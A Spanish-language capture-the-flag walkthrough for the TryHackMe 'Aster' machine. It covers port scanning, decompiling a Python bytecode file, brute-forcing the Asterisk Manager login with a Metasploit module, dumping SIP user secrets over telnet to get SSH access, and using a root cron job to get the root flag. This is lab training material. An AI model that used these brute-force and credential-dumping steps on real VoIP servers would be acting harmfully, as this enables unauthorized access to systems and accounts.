This page looks best with JavaScript enabled

TryHackMe - Aster

 ·  ☕ 9 min read  ·  ✍️ sckull

Aster es una maquina de TryHackMe aqui encontrarás la solucion para obtener la flag user.txt y root.txt.

Informacion de la Maquina

Titulo Aster
Info Hack my server dedicated for building communications applications.
Puntos 110
Dificultad Media
Maker stuxnet

NMAP

Escaneo de puertos tcp, nmap nos muestra el puerto http (80), h323q931(?) (1720), cisco-sccp (2000), asterisk (5038) y el puerto ssh (22) abiertos entre otros de los cuales no logramos obtener mucha informacion.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
# Nmap 7.80 scan initiated Fri Sep 25 15:53:12 2020 as: nmap -p- --min-rate 1000 -o allPorts aster.thm
Warning: 10.10.105.28 giving up on port because retransmission cap hit (10).
Nmap scan report for aster.thm (10.10.105.28)
Host is up (0.25s latency).
Not shown: 65508 closed ports
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http
1720/tcp  open     h323q931
2000/tcp  open     cisco-sccp
5038/tcp  open     unknown
8022/tcp  filtered oa-system
8766/tcp  filtered amcs
9765/tcp  filtered unknown
12914/tcp filtered unknown
12955/tcp filtered unknown
13827/tcp filtered unknown
23734/tcp filtered unknown
24689/tcp filtered unknown
31507/tcp filtered unknown
32749/tcp filtered unknown
35841/tcp filtered unknown
36268/tcp filtered unknown
37303/tcp filtered unknown
39769/tcp filtered unknown
43235/tcp filtered unknown
45589/tcp filtered unknown
46305/tcp filtered unknown
48045/tcp filtered unknown
56150/tcp filtered unknown
60407/tcp filtered unknown
63664/tcp filtered unknown
63871/tcp filtered unknown

# Nmap done at Fri Sep 25 15:55:14 2020 -- 1 IP address (1 host up) scanned in 122.08 seconds
# Nmap 7.80 scan initiated Fri Sep 25 15:57:39 2020 as: nmap -p22,80,1720,2000,5038,8022,8766,9765,12914,12955,13827,23734,24689,31507,32749,35841,36268,37303,39769,43235,45589,46305,48045,56150,60407,63664,63871 -sV -sC -o servicesAllPorts aster.thm
Nmap scan report for aster.thm (10.10.105.28)
Host is up (0.40s latency).

PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 fe:e3:52:06:50:93:2e:3f:7a:aa:fc:69:dd💿14:a2 (RSA)
|   256 9c:4d:fd:a4:4e:18:ca:e2:c0:01:84:8c:d2:7a:51:f2 (ECDSA)
|_  256 c5:93:a6:0c:01:8a:68:63:d7:84:16:dc:2c:0a:96:1d (ED25519)
80/tcp    open   http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Aster CTF
1720/tcp  open   h323q931?
2000/tcp  open   cisco-sccp?
5038/tcp  open   asterisk    Asterisk Call Manager 5.0.2
8022/tcp  closed oa-system
8766/tcp  closed amcs
9765/tcp  closed unknown
12914/tcp closed unknown
12955/tcp closed unknown
13827/tcp closed unknown
23734/tcp closed unknown
24689/tcp closed unknown
31507/tcp closed unknown
32749/tcp closed unknown
35841/tcp closed unknown
36268/tcp closed unknown
37303/tcp closed unknown
39769/tcp closed unknown
43235/tcp closed unknown
45589/tcp closed unknown
46305/tcp closed unknown
48045/tcp closed unknown
56150/tcp closed unknown
60407/tcp closed unknown
63664/tcp closed unknown
63871/tcp closed unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 25 15:58:42 2020 -- 1 IP address (1 host up) scanned in 62.78 seconds

HTTP

Encontramos una pagina web en el puerto 80 en la que nos da un script en python.
image

1
2
3
kali@kali:~/thm/aster$ file output.pyc 
output.pyc: python 2.7 byte-compiled
kali@kali:~/thm/aster$

Utilizamos uncompyle6 para extraer el codigo fuente el cual contenia algunos mensajes codificados en hex.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
# uncompyle6 version 3.7.3
# Python bytecode 2.7 (62211)
# Decompiled from: Python 3.8.2 (default, Apr  1 2020, 15:52:55) 
# [GCC 9.3.0]
# Embedded file name: ./output.py
# Compiled at: 2020-08-11 02:59:35
import pyfiglet
pyfiglet_var = pyfiglet.figlet_format('Hello!!')
oO00oOo = '476f6f64206a6f622c2075736572202261646d696e2220746865206f70656e20736f75726365206672616d65776f726b20666f72206275696c64696e6720636f6d6d756e69636174696f6e732c20696e7374616c6c656420696e20746865207365727665722e'
OOOo0 = bytes.fromhex(oO00oOo)
Oooo000o = OOOo0.decode('ASCII')
if 0:
    i1 * ii1IiI1i % OOooOOo / I11i / o0O / IiiIII111iI
Oo = '476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21'
I1Ii11I1Ii1i = bytes.fromhex(Oo)
Ooo = I1Ii11I1Ii1i.decode('ASCII')
if 0:
    iii1I1I / O00oOoOoO0o0O.O0oo0OO0 + Oo0ooO0oo0oO.I1i1iI1i - II
print pyfiglet_var
# okay decompiling output.pyc

Vemos en uno de los mensajes el usuario admin y que esta instalado algun software de comunicacion en el servidor.

1
2
3
476f6f64206a6f622c2075736572202261646d696e2220746865206f70656e20736f75726365206672616d65776f726b20666f72206275696c64696e6720636f6d6d756e69636174696f6e732c20696e7374616c6c656420696e20746865207365727665722e: Good job, user "admin" the open source framework for building communications, installed in the server.

476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21476f6f64206a6f622072657665727365722c20707974686f6e206973207665727920636f6f6c21: Good job reverser, python is very cool!Good job reverser, python is very cool!Good job reverser, python is very cool!

GOBUSTER

Utilizamos gobuster para busqueda de directorios y archivos pero no encontramos más que solo los archivos estaticos de la pagina.

1
2
3
4
5
6
kali@kali:~/thm/aster$ gobuster dir -u http://aster.thm/ -w /usr/share/wordlists/dirb/common.txt -q -t 25 -x php,html,txt
/assets (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)

ASTERISK

Entre los puertos que encontramos se encuentra Asterisk Call Manager 5.0.2 el cual permite que un usuario se conecte a este puerto y ejecute comandos o lea eventos. Al investigar sobre este “servicio/server” encontramos un post donde realizan un ‘Pentesting’ a este servicio, primero utilizamos el modulo de metasploit use auxiliary/voip/asterisk_login el cual realiza un ataque de fuerza bruta, conociendo un nombre de usuario (admin) y utilizando los wordlist que vienen por defecto ejecutamos el modulo. Logrando encontrar la “contraseña” de este usuario.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
msf5 > use auxiliary/voip/asterisk_login
msf5 auxiliary(voip/asterisk_login) > set USERNAME admin
USERNAME => admin
msf5 auxiliary(voip/asterisk_login) > set rhosts aster.thm
rhosts => aster.thm
msf5 auxiliary(voip/asterisk_login) > show options 

Module options (auxiliary/voip/asterisk_login):

   Name              Current Setting                                                    Required  Description
   ----              ---------------                                                    --------  -----------
   BLANK_PASSWORDS   false                                                              no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                  yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                              no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                              no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                              no        Add all users in the current database to the list
   PASSWORD                                                                             no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt  no        The file that contains a list of probable passwords.
   RHOSTS            aster.thm                                                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5038                                                               yes       The target port (TCP)
   STOP_ON_SUCCESS   true                                                              yes       Stop guessing when a credential works for a host
   THREADS           1                                                                  yes       The number of concurrent threads (max one per host)
   USERNAME          admin                                                              no        A specific username to authenticate as
   USERPASS_FILE                                                                        no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS      false                                                              no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/unix_users.txt      no        The file that contains a list of probable users accounts.
   VERBOSE           true                                                               yes       Whether to print output for all attempts

msf5 auxiliary(voip/asterisk_login) > set stop_on_success true
stop_on_success => true
msf5 auxiliary(voip/asterisk_login) > 
msf5 auxiliary(voip/asterisk_login) > run

[*] 10.10.160.101:5038    - Initializing module...
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'admin'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'123456'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'12345'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'123456789'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'password'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'iloveyou'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'princess'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'1234567'
[*] 10.10.160.101:5038    - 10.10.160.101:5038 - Trying user:'admin' with password:'12345678'
[+] 10.10.160.101:5038    - User: "admin" using pass: "[... REDACTED ...]" - can login on 10.10.160.101:5038!
[!] 10.10.160.101:5038    - No active DB -- Credential data will not be saved!
[*] aster.thm:5038        - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(voip/asterisk_login) >

Nos conectamos a este servicio utilizando telnet pasando las credenciales para autenticarnos:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
kali@kali:~/thm/aster$ telnet aster.thm 5038
Trying 10.10.160.101...
Connected to aster.thm.
Escape character is '^]'.
Asterisk Call Manager/5.0.2
Action: Login
Username: admin
Secret: [... REDACTED ...]

Response: Success
Message: Authentication accepted

Event: FullyBooted
Privilege: system,all
Uptime: 5368
LastReload: 5368
Status: Fully Booted

HARRY - USER

Enumeramos informacion SIP el cual contiene usuarios, “contraseñas” (secrets) y extensiones. Vemos que tenemos la “contraseña” del usuario harry, utilizamos esta en el servicio SSH y logramos obtener una shell y nuestra flag user.txt.

1
2
3
4
5
6
7
8
9
Action: command
Command:  sip show users

Response: Success
Message: Command output follows
Output: Username                   Secret           Accountcode      Def.Context      ACL  Forcerport
Output: 100                        100                               test             No   No        
Output: 101                        101                               test             No   No        
Output: harry                      [... REDACTED ...]                test             No   No        

image

ROOT FLAG

Dentro de la carpeta de harry encontramos el archivo Example_Root.jar el cual decompilamos utilizando JavaDecompilers y encontramos que el codigo valida que el archivo /tmp/flag.dat existe, en tal caso escribe dentro de del archivo /home/harry/root.txt la cadena my secret <3 baby.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import java.io.IOException;
import java.io.FileWriter;
import java.io.File;

// 
// Decompiled by Procyon v0.5.36
// 

public class Example_Root
{
    public static boolean isFileExists(final File file) {
        return file.isFile();
    }
    
    public static void main(final String[] array) {
        final File file = new File("/tmp/flag.dat");
        try {
            if (isFileExists(file)) {
                final FileWriter fileWriter = new FileWriter("/home/harry/root.txt");
                fileWriter.write("my secret <3 baby");
                fileWriter.close();
                System.out.println("Successfully wrote to the file.");
            }
        }
        catch (IOException ex) {
            System.out.println("An error occurred.");
            ex.printStackTrace();
        }
    }
}

Realizamos una enumeracion en la maquina y encontramos dos cron que se ejecutan como usuario root

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
harry@ubuntu:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
*  *	* * *	root	cd /opt/ && bash ufw.sh
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *	* * *	root	cd /root/java/ && bash run.sh
#

El primero ejecuta ufw, el segundo al parecer ejecuta algun archivo java.

1
ufw disable

Utilizamos pspy para ver que comandos se ejecutan tomando encuenta el segundo cron. Vemos que posiblemente el archivo run.sh ejecuta java -jar root.jar que se encuentra en la carpeta /root/java/.
image

Si tomamos encuenta que el archivo Example_Root.jar solo es un ejemplo, quizas el archivo root.jar es el original y realiza la escritura en /home/harry/root.txt de algun string y posiblemente nuestra flag root.txt. Para comprobar esto vamos a crear el archivo /tmp/flag.dat y esperar a que el cron se ejecute.

1
touch /tmp/flag.dat

Logramos obtener nuestra flag root.txt.

image

Share on

sckull
WRITTEN BY
sckull
Pentester wannabe

THM: Aster